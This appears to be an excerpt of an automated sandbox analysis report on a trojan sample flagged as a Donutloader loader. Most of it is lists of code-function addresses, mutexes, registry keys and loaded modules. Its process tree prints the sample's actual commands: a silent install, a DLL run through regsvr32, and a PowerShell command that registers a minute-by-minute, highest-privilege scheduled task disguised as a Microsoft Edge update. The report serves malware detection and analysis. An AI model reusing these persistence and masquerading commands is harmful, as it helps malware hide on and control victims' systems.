Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E43360	5_2_02E43360
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E5FF94	5_2_02E5FF94
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E46790	5_2_02E46790
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E474F0	5_2_02E474F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E48440	5_2_02E48440
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E515C0	5_2_02E515C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E5AA5C	5_2_02E5AA5C
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E60A00	5_2_02E60A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E51BF0	5_2_02E51BF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E43BA0	5_2_02E43BA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E5D328	5_2_02E5D328
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E5B0BC	5_2_02E5B0BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E5C870	5_2_02E5C870
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E4B050	5_2_02E4B050
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E42850	5_2_02E42850
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E6C804	5_2_02E6C804
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E4C1A0	5_2_02E4C1A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E45930	5_2_02E45930
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E48EC0	5_2_02E48EC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E5BEDC	5_2_02E5BEDC
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E5AE80	5_2_02E5AE80
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E49650	5_2_02E49650
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E63650	5_2_02E63650
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E4F790	5_2_02E4F790
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E55F90	5_2_02E55F90
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E60F30	5_2_02E60F30
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E6B4EC	5_2_02E6B4EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E5F4E8	5_2_02E5F4E8
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E69CA0	5_2_02E69CA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E49460	5_2_02E49460
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E60414	5_2_02E60414
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E6CD40	5_2_02E6CD40
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E6BD50	5_2_02E6BD50
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E4F520	5_2_02E4F520
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E62D00	5_2_02E62D00
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013E0170	5_2_00007FFE013E0170
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE014102C0	5_2_00007FFE014102C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D5DE8	5_2_00007FFE013D5DE8
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01417C90	5_2_00007FFE01417C90
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D5D24	5_2_00007FFE013D5D24
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01421FE0	5_2_00007FFE01421FE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D1E80	5_2_00007FFE013D1E80
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE0142E1B0	5_2_00007FFE0142E1B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013EC170	5_2_00007FFE013EC170
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01402220	5_2_00007FFE01402220
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013DC1D0	5_2_00007FFE013DC1D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE014340B0	5_2_00007FFE014340B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013EB050	5_2_00007FFE013EB050
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01433070	5_2_00007FFE01433070
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01405130	5_2_00007FFE01405130
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013EE0E0	5_2_00007FFE013EE0E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01420400	5_2_00007FFE01420400
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01420420	5_2_00007FFE01420420
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013F13C0	5_2_00007FFE013F13C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE0143E3C0	5_2_00007FFE0143E3C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D6280	5_2_00007FFE013D6280
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FB290	5_2_00007FFE013FB290
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE0140B300	5_2_00007FFE0140B300
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FC32F	5_2_00007FFE013FC32F
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FC2DB	5_2_00007FFE013FC2DB
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FC2F2	5_2_00007FFE013FC2F2
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01410610	5_2_00007FFE01410610
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE014325D0	5_2_00007FFE014325D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01408460	5_2_00007FFE01408460
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE0141F4F0	5_2_00007FFE0141F4F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D4790	5_2_00007FFE013D4790
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D474F	5_2_00007FFE013D474F
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01417760	5_2_00007FFE01417760
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013EA680	5_2_00007FFE013EA680
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D4703	5_2_00007FFE013D4703
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FB700	5_2_00007FFE013FB700
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01422730	5_2_00007FFE01422730
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01405730	5_2_00007FFE01405730
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE0140A6E0	5_2_00007FFE0140A6E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE014169A0	5_2_00007FFE014169A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013DD9C0	5_2_00007FFE013DD9C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013F3880	5_2_00007FFE013F3880
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE0141B840	5_2_00007FFE0141B840
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01415900	5_2_00007FFE01415900
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FB927	5_2_00007FFE013FB927
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013F3930	5_2_00007FFE013F3930
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01433B80	5_2_00007FFE01433B80
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FBB96	5_2_00007FFE013FBB96
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE0140CB50	5_2_00007FFE0140CB50
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013E2B60	5_2_00007FFE013E2B60
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013E1C32	5_2_00007FFE013E1C32
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013E3BC0	5_2_00007FFE013E3BC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FBBEF	5_2_00007FFE013FBBEF
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01415AB0	5_2_00007FFE01415AB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013F7A40	5_2_00007FFE013F7A40
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D5D44	5_2_00007FFE013D5D44
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FBD3F	5_2_00007FFE013FBD3F
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013F0DD0	5_2_00007FFE013F0DD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE0141EDE0	5_2_00007FFE0141EDE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013EDC90	5_2_00007FFE013EDC90
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013F1D30	5_2_00007FFE013F1D30
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FBCD9	5_2_00007FFE013FBCD9
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013F2CD0	5_2_00007FFE013F2CD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FBF40	5_2_00007FFE013FBF40
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01415F40	5_2_00007FFE01415F40
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE01416F79	5_2_00007FFE01416F79
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013EC000	5_2_00007FFE013EC000
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FBFCE	5_2_00007FFE013FBFCE
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013E7E70	5_2_00007FFE013E7E70
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013FBEC4	5_2_00007FFE013FBEC4
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013DCEE0	5_2_00007FFE013DCEE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D9EF0	5_2_00007FFE013D9EF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02873390	5_2_02873390
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028773D0	5_2_028773D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02876860	5_2_02876860
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_0287A30C	5_2_0287A30C
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02872880	5_2_02872880
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02884898	5_2_02884898
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_0287E1C0	5_2_0287E1C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02876F70	5_2_02876F70
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02886C50	5_2_02886C50
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028B3A9D	5_2_028B3A9D
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028B7ADD	5_2_028B7ADD
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028BAA19	5_2_028BAA19
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028B767D	5_2_028B767D
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028B2F8D	5_2_028B2F8D
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028C4FA5	5_2_028C4FA5
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028C735D	5_2_028C735D
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028B6F6D	5_2_028B6F6D
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028BE8CD	5_2_028BE8CD
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D76261	5_2_02D76261
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D85A61	5_2_02D85A61
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D8FA65	5_2_02D8FA65
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D72321	5_2_02D72321
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D81091	5_2_02D81091
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D78991	5_2_02D78991
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D8B9AD	5_2_02D8B9AD
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D79121	5_2_02D79121
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D816C1	5_2_02D816C1
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D8FEE5	5_2_02D8FEE5
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D7E6B1	5_2_02D7E6B1
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D73671	5_2_02D73671
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D72E31	5_2_02D72E31
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D927D1	5_2_02D927D1
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D76FC1	5_2_02D76FC1
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D7EFF1	5_2_02D7EFF1
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D904D1	5_2_02D904D1
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D7BC71	5_2_02D7BC71
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D75401	5_2_02D75401
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D8A52D	5_2_02D8A52D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9B624FFB	6_2_00007FFD9B624FFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B604DFB	8_2_00007FFD9B604DFB

Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFE01404B20 appears 46 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFE013DA6D0 appears 32 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFE013ECE50 appears 54 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFE013DA3D0 appears 73 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFE01423D5C appears 94 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFE013DBB00 appears 48 times

Source: RXxeYma4d5.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: RXxeYma4d5.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: RXxeYma4d5.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: RXxeYma4d5.tmp.2.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: RXxeYma4d5.tmp.2.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-HU557.tmp.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-HU557.tmp.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: is-I9R0P.tmp.3.dr

Static PE information: Number of sections : 11 > 10

Source: RXxeYma4d5.exe, 00000000.00000003.1666133308.0000000002561000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs RXxeYma4d5.exe
Source: RXxeYma4d5.exe, 00000000.00000003.1666348689.000000007FE3D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs RXxeYma4d5.exe

Source: RXxeYma4d5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 5.2.regsvr32.exe.c695bd.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 5.2.regsvr32.exe.28b130d.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.2926694272.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/21@0/1

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_00007FFE013EFD00 memset,FormatMessageW,GetLastError,HeapFree,HeapFree,

5_2_00007FFE013EFD00

Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E492E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	5_2_02E492E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E4A900 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,	5_2_02E4A900
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E48E00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,	5_2_02E48E00
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E48C80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,OpenProcess,	5_2_02E48C80

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E48180 GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,

5_2_02E48180

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E47400 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

5_2_02E47400

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E47A90 CoInitialize,CoCreateInstance,SysFreeString,CoUninitialize,

5_2_02E47A90

Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp

File created: C:\Users\user\AppData\Local\unins000.dat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\2024.12.23
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\xjyFV

Source: C:\Users\user\Desktop\RXxeYma4d5.exe

File created: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp

Jump to behavior

Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RXxeYma4d5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: RXxeYma4d5.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\RXxeYma4d5.exe

File read: C:\Users\user\Desktop\RXxeYma4d5.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RXxeYma4d5.exe "C:\Users\user\Desktop\RXxeYma4d5.exe"
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Process created: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp "C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp" /SL5="$10480,572569,203776,C:\Users\user\Desktop\RXxeYma4d5.exe"
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Process created: C:\Users\user\Desktop\RXxeYma4d5.exe "C:\Users\user\Desktop\RXxeYma4d5.exe" /VERYSILENT
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Process created: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp "C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp" /SL5="$20484,572569,203776,C:\Users\user\Desktop\RXxeYma4d5.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{8208A45D-F29A-4A60-CBD5-99028FB966B8}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /i:360 /s C:\Users\user\AppData\Roaming\Setup_Cow.dll
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Process created: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp "C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp" /SL5="$10480,572569,203776,C:\Users\user\Desktop\RXxeYma4d5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Process created: C:\Users\user\Desktop\RXxeYma4d5.exe "C:\Users\user\Desktop\RXxeYma4d5.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Process created: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp "C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp" /SL5="$20484,572569,203776,C:\Users\user\Desktop\RXxeYma4d5.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{8208A45D-F29A-4A60-CBD5-99028FB966B8}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /i:360 /s C:\Users\user\AppData\Roaming\Setup_Cow.dll	Jump to behavior

Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: mpr.dll	Jump to behavior
